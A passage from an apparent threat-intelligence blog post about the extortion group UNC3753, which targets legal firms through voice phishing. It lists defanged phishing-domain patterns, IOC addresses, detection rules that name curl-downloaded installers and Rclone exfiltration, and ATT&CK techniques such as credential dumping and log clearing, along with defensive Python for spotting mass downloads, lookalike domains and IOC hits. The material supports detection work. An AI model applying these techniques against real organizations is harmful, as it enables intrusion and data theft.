&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Implement strict BYOD authentication controls, requiring MFA step-up queries when accessing VDI nodes.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
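&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Where a document store does not offer built-in alerting, exported audit events can be checked for mass downloads with a sliding window. The following Python sketch is a hedged illustration: the event shape (a timestamp in seconds paired with a user name) and the default limits are assumptions, not values taken from iManage, SharePoint, or any other product.&lt;/span&gt;&lt;/p&gt;

```python
from collections import defaultdict, deque


def find_download_bursts(events, max_downloads=100, window_seconds=300):
    """Return the set of users who exceed max_downloads within any window.

    `events` is an iterable of (timestamp_seconds, user) tuples, one per
    file download. Both the tuple layout and the defaults are hypothetical.
    """
    recent = defaultdict(deque)  # user -> timestamps inside the current window
    flagged = set()
    for timestamp, user in sorted(events):
        window = recent[user]
        window.append(timestamp)
        # Drop downloads that fell out of the sliding window.
        while timestamp - window[0] > window_seconds:
            window.popleft()
        if len(window) > max_downloads:
            flagged.add(user)
    return flagged
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Thresholds should be tuned per repository, since legitimate bulk activity (for example, matter transfers) varies widely between organizations.&lt;/span&gt;&lt;/p&gt;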
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Outlook and Implications&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The targeting of US legal and professional services organizations by financially motivated actors is a persistent industry risk. Legal services firms represent high-value targets for extortion actors. They maintain concentrated repositories of extremely sensitive client transaction files, merger and acquisition plans, client trade secrets, and corporate regulatory reports. Threat groups recognize that legal entities are subject to heavy reputational and regulatory exposure and may be highly motivated to resolve extortion situations quietly to protect their professional standing.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Threat actors recognize that targeting the human element—specifically using voice-guided social engineering—enables them to easily bypass robust technical perimeters, web security gateways, and MFA configurations. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, the integration of in-person, physical intrusions represents an escalation in threat capability. While log-based defenses and endpoint telemetry have matured, physical corporate boundaries are frequently protected only by administrative procedures. Organizations must transition to a unified security posture that treats physical facility access control and endpoint-based hardware policies as equal components of their defensive perimeter.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Data Leak Site (DLS)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 utilizes the following web platform to disclose the identities of victims and their compromised data.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;hxxps[:]//business-data-leaks[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Phishing Domains&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG identified infrastructure registrations by suspected UNC3753 actors utilizing specific naming conventions, assessed as supporting their ongoing social engineering and vishing activities.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&amp;lt;organization&amp;gt;-itdesk[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&amp;lt;organization&amp;gt;-it[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;&amp;lt;organization&amp;gt;-helpdesk[.]com&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
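&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations can check newly observed or newly registered domains against these naming conventions. The Python sketch below is one possible approach under stated assumptions: the function names are hypothetical, the organization labels are supplied by the caller, and only the three suffixes listed above are covered.&lt;/span&gt;&lt;/p&gt;

```python
import re

# Matches "(organization)-itdesk.com", "(organization)-it.com", and
# "(organization)-helpdesk.com", the conventions listed above.
LOOKALIKE = re.compile(r"^([a-z0-9][a-z0-9-]*)-(itdesk|it|helpdesk)\.com$")


def refang(indicator: str) -> str:
    """Convert a defanged domain such as example[.]com back to example.com."""
    return indicator.replace("[.]", ".")


def match_lookalike(domain: str, org_labels: set):
    """Return the impersonated organization label, or None if there is no match.

    `org_labels` holds lowercase labels to protect, for example {"examplecorp"}.
    """
    candidate = refang(domain).strip().lower().rstrip(".")
    match = LOOKALIKE.match(candidate)
    if match is None:
        return None
    org = match.group(1)
    return org if org in org_labels else None
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For example, with &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;org_labels&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; set to a placeholder label such as "examplecorp", the domain "examplecorp-helpdesk[.]com" is matched, while "examplecorp[.]com" and domains for unrelated organizations are not.&lt;/span&gt;&lt;/p&gt;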
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Indicators of Compromise (IOCs) &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a &lt;a href="https://www.virustotal.com/gui/collection/598281d2c6de83adf1505ee6077608d0c043623d477e2884d36d65e90686d67a/summary" rel="noopener" target="_blank"&gt;GTI Collection&lt;/a&gt; for registered users.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col/&gt;&lt;col/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;IOC Type&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.147.131&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.147.138&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;193.141.60.212&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.154.158&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;192.236.146.173&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;174.169.162.62&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IPv4 Address&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;64.94.84.97&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
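&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The IPv4 indicators above can be swept against historical logs. The following Python sketch is a simple illustration that assumes plain-text log lines; the function name and the token-matching approach are choices made for this example, and a match should be treated as a lead for investigation rather than proof of compromise.&lt;/span&gt;&lt;/p&gt;

```python
import re

# IPv4 indicators copied from the IOC table above.
IOC_IPS = frozenset({
    "192.236.147.131",
    "192.236.147.138",
    "193.141.60.212",
    "192.236.154.158",
    "192.236.146.173",
    "174.169.162.62",
    "64.94.84.97",
})

# Loose dotted-quad matcher; it does not validate octet ranges.
IPV4_TOKEN = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def find_ioc_hits(log_lines):
    """Return a list of (line_number, ip) for every IOC address seen."""
    hits = []
    for line_number, line in enumerate(log_lines, start=1):
        for ip in IPV4_TOKEN.findall(line):
            if ip in IOC_IPS:
                hits.append((line_number, ip))
    return hits
```

&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Matching whole address tokens rather than substrings avoids false hits on longer addresses that merely contain an indicator as a prefix or suffix.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;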
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Google Security Operations (SecOps)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google SecOps customers have access to these broad category rules and more under the Mandiant Intel Emerging Threats rule pack. The activity discussed in the blog post is detected in Google SecOps under the rule names:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Execute MSI Files Downloaded via Curl&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Suspected Rclone Exfiltration&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;MITRE ATT&amp;amp;CK&lt;/span&gt;&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;
&lt;div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col/&gt;&lt;col/&gt;&lt;col/&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Tactic&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Technique ID&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Technique Name&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Initial Access&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1566.004&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Phishing: Spearphishing Voice&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1133&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;External Remote Services&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="4" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Execution&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1204.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;User Execution: Malicious File&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1059.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Command and Scripting Interpreter: PowerShell&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1059.003&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Command and Scripting Interpreter: Windows Command Shell&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1569.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;System Services: Service Execution&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Persistence&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1053.005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Scheduled Task/Job: Scheduled Task&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1547.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="4" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Defense Evasion&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1036.005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Masquerading: Match Legitimate Name or Location&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1553.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Subvert Trust Controls: Code Signing&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1562.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Impair Defenses: Disable or Modify Tools&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1070.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Indicator Removal: Clear Windows Event Logs&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="2" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Credential Access&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1003.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OS Credential Dumping: LSASS Memory&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1003.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;OS Credential Dumping: Security Account Manager&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Discovery&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1083&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;File and Directory Discovery&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1135&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Network Share Discovery&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1046&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Network Service Discovery&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Lateral Movement&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1219&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Access Software&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1021.001&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Services: Remote Desktop Protocol&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1021.004&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Services: SSH&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Collection&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1005&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Data from Local System&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Command &amp;amp; Control&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1572&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Protocol Tunneling&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td rowspan="3" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Exfiltration&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1020&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Automated Exfiltration&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;T1567.002&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Exfiltration Over Web Service: Exfiltration to Cloud Storage&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
